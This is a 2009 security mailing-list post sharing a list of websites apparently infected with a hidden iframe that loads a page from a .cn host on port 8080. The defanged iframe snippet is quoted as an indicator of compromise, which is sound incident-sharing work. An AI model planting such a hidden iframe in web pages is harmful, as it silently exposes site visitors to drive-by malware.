[nsp-sec] *.cn:8080 infected sites
Dirk Stander
dst+nsp-sec at glaskugel.org
Mon Jun 8 09:05:15 EDT 2009
Hi,
please find attached a list of sites which are most likely infected with a
<iframe src="hxxp://globalnameshop.cn:8080/index.php" width=104 height=187 style="visibility: hidden"></iframe>
style iframe. The format of the file is:
<ASN> | <IP of infected site> | <CC> | <normalized domain> <hits> <sample URI>
The infections are in place at least since 2009/06/06 14:17:35.
kind regards, Dirk Stander (1&1) :.
More information about the nsp-security
mailing list